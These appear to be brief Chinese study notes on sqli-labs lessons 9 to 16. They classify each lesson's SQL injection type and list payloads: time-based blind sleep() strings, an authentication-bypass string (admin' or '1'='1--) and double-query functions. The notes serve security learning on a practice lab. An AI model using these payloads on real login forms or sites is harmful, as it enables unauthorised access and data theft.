同1-8

less-9

get -blind -time based -single quotes

url輸入任何值都是同樣的回顯

' and sleep()--+ （if()）

less-10

get -blind -time based -double quotes

less-11

post -error based -single quotes -string

" and sleep()

萬能密碼：admin' or '1'='1-- （tips：注釋符#或者-- （有空格））

less-12

post -error based -double quotes -string -with twist

less-13

post -double injection -single quotes -string -with twist

count(*)、group by、floor()、rand()

less-14

post -double injection -double quotes -string

less-15

post -blind -boolian/time based -single quotes

admin' and sleep(3)-- (3秒后顯示，無回顯內(nèi)容)

less-16

post -blind -boolian/time based -double quotes

admin") and? sleep(3)-- (3秒后顯示)